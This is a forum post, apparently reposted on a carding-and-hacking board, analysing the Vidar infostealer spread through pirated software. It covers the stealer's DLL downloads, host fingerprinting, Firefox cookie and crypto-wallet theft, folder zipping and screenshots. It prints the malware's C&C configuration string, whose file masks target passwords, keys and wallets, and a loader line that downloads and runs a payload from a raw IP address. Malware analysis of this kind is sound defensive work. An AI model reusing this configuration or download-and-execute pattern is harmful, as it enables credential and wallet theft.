Home
Forums
New posts
Search forums
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Home
Forums
CARDING & HACKING
HOSTING & BOTNET
Pirated software and its consequences: an analysis of the oldest and simplest viral foothold on the Internet
Message
<blockquote data-quote="Ghosthunter" data-source="post: 502" data-attributes="member: 6"><p> <ol> <li data-xf-list-type="ol">mozglue.dll</li> <li data-xf-list-type="ol">msvcp140.dll</li> <li data-xf-list-type="ol">nss3.dll</li> <li data-xf-list-type="ol">softokn3.dll</li> <li data-xf-list-type="ol">vcruntime140.dll</li> <li data-xf-list-type="ol">msvcp140.dll</li> </ol><p>It is also noteworthy that the downloaded DLL files will be saved in a separate folder created by the malware. It is located at the following path:</p><p></p><p>C:\ProgramData\local\dekddss\hyper\v\</p><p></p><p>As you can see, the file is missing here sqlite3.dll, because stiller doesn't implement the method of data theft via SQL queries.</p><p></p><p>Then stiller will make a request to the C&C server to get a more detailed configuration of the work, this is implemented by the same request to the FACEIT API page.</p><p></p><p>It will contain 12 values separated by“*”.:</p><p></p><p>1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*;50;true;movies:music:mp3;</p><p></p><p>This page may change depending on the attacker's preferences, but in most cases it is not modified.</p><p></p><p>If you read the previous article, you can guess that the process of collecting information about the victim's host will follow. Stiller will collect the following data:</p><ul> <li data-xf-list-type="ul">username,</li> <li data-xf-list-type="ul">operating system version,</li> <li data-xf-list-type="ul">time zone and system time in file format,</li> <li data-xf-list-type="ul">technical information: name of the processor, video card, and amount of RAM,</li> <li data-xf-list-type="ul">installed applications and display tools (web cameras, monitors, etc.).</li> </ul><p>The following code snippets responsible for this step were decoded:</p><p></p><p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/367/de7/4d6/367de74d67b1dabef38bfcec044d19c6.png" alt="367de74d67b1dabef38bfcec044d19c6.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/72e/6f2/02c/72e6f202c9a662ececc661296d18895f.png" alt="72e6f202c9a662ececc661296d18895f.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><h4>5. Direct data theft</h4><p>Unlike its Raccoon counterpart, Vidar does not have the ability to interact with most browsers. Due to the lack of implementation of the DLL file sqlite3.dll, the functionality of this stiller is noticeably reduced. Therefore, the only thing it can do is steal cookies from Firefox. This will be implemented via an additional file mozglue3.dll and a request to the logins.jscon file. Cookie theft is very limited, but if you consider that the number of active Firefox users at the end of the second quarter of 2022 was 198 million people per month,then there is no problem in this.</p><p></p><p>Next, the wallet. dat files are searched, and I remind you that this file contains the seed phrase and other information about the crypto wallet. This is only relevant for users of applications from crypto companies. It is also interesting that the malware is able to search for files with any extension.</p><p></p><p>But Vidar is still notable for some things: it is able to compress individual folders into a ZIP file and send them to the command server. This is done, rather, for convenience. Let's imagine the following picture: an attacker has successfully installed a malware on the victim's device in some way, and let's assume that this was an attack on a specific person. The villain obviously knows what incriminating materials he needs to steal: photos, videos, and so on. Naturally, the victim, like most people, stores these materials in their respective folders. To avoid downloading files separately, it is much faster to compress the entire folder into a ZIP archive.</p><p></p><p>The archive name is unique for each device and consists of MachineGuid.</p><p></p><p></p><p>Like Raccoon, this malware can take screenshots and send them to the command server. The screenshot below shows the code snippet responsible for this action:</p><p></p><p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/4b9/2b6/f8e/4b92b6f8e93a5866c4f60a8dfffe17cb.png" alt="4b92b6f8e93a5866c4f60a8dfffe17cb.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>This process is optional and is initiated by an attacker. The condition for performing this function is that the following line is present in the configuration file ` ' scrnsht_.</p><p></p><h4>6. Installing additional malware</h4><p>This step is mandatory and is always performed. The following line in the configuration file is responsible for this process:</p><p></p><p>ldr_1:<a href="http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin%7C%TEMP%/%7Cexe" target="_blank">http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin|%TEMP%\|exe</a></p><p></p><p>The choice of payload loaded by the malware is left to the attacker. The analyzed sample contained the usual Java Spybee keylogger, which is publicly available on the GitHub platform. A controversial choice. Why it was chosen is a mystery.</p><p></p><p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/e95/0da/1c8/e950da1c86292dc26fc4a5786fb2ecb7.png" alt="e950da1c86292dc26fc4a5786fb2ecb7.png" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p></p><p>Also, this line shows an additional server that is currently unavailable, so it is still impossible to get deeper into the malware's infrastructure.</p></blockquote><p></p>
[QUOTE="Ghosthunter, post: 502, member: 6"] [LIST=1] [*]mozglue.dll [*]msvcp140.dll [*]nss3.dll [*]softokn3.dll [*]vcruntime140.dll [*]msvcp140.dll [/LIST] It is also noteworthy that the downloaded DLL files will be saved in a separate folder created by the malware. It is located at the following path: C:\ProgramData\local\dekddss\hyper\v\ As you can see, the file is missing here sqlite3.dll, because stiller doesn't implement the method of data theft via SQL queries. Then stiller will make a request to the C&C server to get a more detailed configuration of the work, this is implemented by the same request to the FACEIT API page. It will contain 12 values separated by“*”.: 1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*;50;true;movies:music:mp3; This page may change depending on the attacker's preferences, but in most cases it is not modified. If you read the previous article, you can guess that the process of collecting information about the victim's host will follow. Stiller will collect the following data: [LIST] [*]username, [*]operating system version, [*]time zone and system time in file format, [*]technical information: name of the processor, video card, and amount of RAM, [*]installed applications and display tools (web cameras, monitors, etc.). [/LIST] The following code snippets responsible for this step were decoded: [IMG alt="367de74d67b1dabef38bfcec044d19c6.png"]https://habrastorage.org/r/w1560/getpro/habr/upload_files/367/de7/4d6/367de74d67b1dabef38bfcec044d19c6.png[/IMG] [IMG alt="72e6f202c9a662ececc661296d18895f.png"]https://habrastorage.org/r/w1560/getpro/habr/upload_files/72e/6f2/02c/72e6f202c9a662ececc661296d18895f.png[/IMG] [HEADING=3]5. Direct data theft[/HEADING] Unlike its Raccoon counterpart, Vidar does not have the ability to interact with most browsers. Due to the lack of implementation of the DLL file sqlite3.dll, the functionality of this stiller is noticeably reduced. Therefore, the only thing it can do is steal cookies from Firefox. This will be implemented via an additional file mozglue3.dll and a request to the logins.jscon file. Cookie theft is very limited, but if you consider that the number of active Firefox users at the end of the second quarter of 2022 was 198 million people per month,then there is no problem in this. Next, the wallet. dat files are searched, and I remind you that this file contains the seed phrase and other information about the crypto wallet. This is only relevant for users of applications from crypto companies. It is also interesting that the malware is able to search for files with any extension. But Vidar is still notable for some things: it is able to compress individual folders into a ZIP file and send them to the command server. This is done, rather, for convenience. Let's imagine the following picture: an attacker has successfully installed a malware on the victim's device in some way, and let's assume that this was an attack on a specific person. The villain obviously knows what incriminating materials he needs to steal: photos, videos, and so on. Naturally, the victim, like most people, stores these materials in their respective folders. To avoid downloading files separately, it is much faster to compress the entire folder into a ZIP archive. The archive name is unique for each device and consists of MachineGuid. Like Raccoon, this malware can take screenshots and send them to the command server. The screenshot below shows the code snippet responsible for this action: [IMG alt="4b92b6f8e93a5866c4f60a8dfffe17cb.png"]https://habrastorage.org/r/w1560/getpro/habr/upload_files/4b9/2b6/f8e/4b92b6f8e93a5866c4f60a8dfffe17cb.png[/IMG] This process is optional and is initiated by an attacker. The condition for performing this function is that the following line is present in the configuration file ` ' scrnsht_. [HEADING=3]6. Installing additional malware[/HEADING] This step is mandatory and is always performed. The following line in the configuration file is responsible for this process: ldr_1:[URL='http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin%7C%TEMP%/%7Cexe']http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin|%TEMP%\|exe[/URL] The choice of payload loaded by the malware is left to the attacker. The analyzed sample contained the usual Java Spybee keylogger, which is publicly available on the GitHub platform. A controversial choice. Why it was chosen is a mystery. [IMG alt="e950da1c86292dc26fc4a5786fb2ecb7.png"]https://habrastorage.org/r/w1560/getpro/habr/upload_files/e95/0da/1c8/e950da1c86292dc26fc4a5786fb2ecb7.png[/IMG] Also, this line shows an additional server that is currently unavailable, so it is still impossible to get deeper into the malware's infrastructure. [/QUOTE]
Name
Verification
Post reply
Home
Forums
CARDING & HACKING
HOSTING & BOTNET
Pirated software and its consequences: an analysis of the oldest and simplest viral foothold on the Internet
Top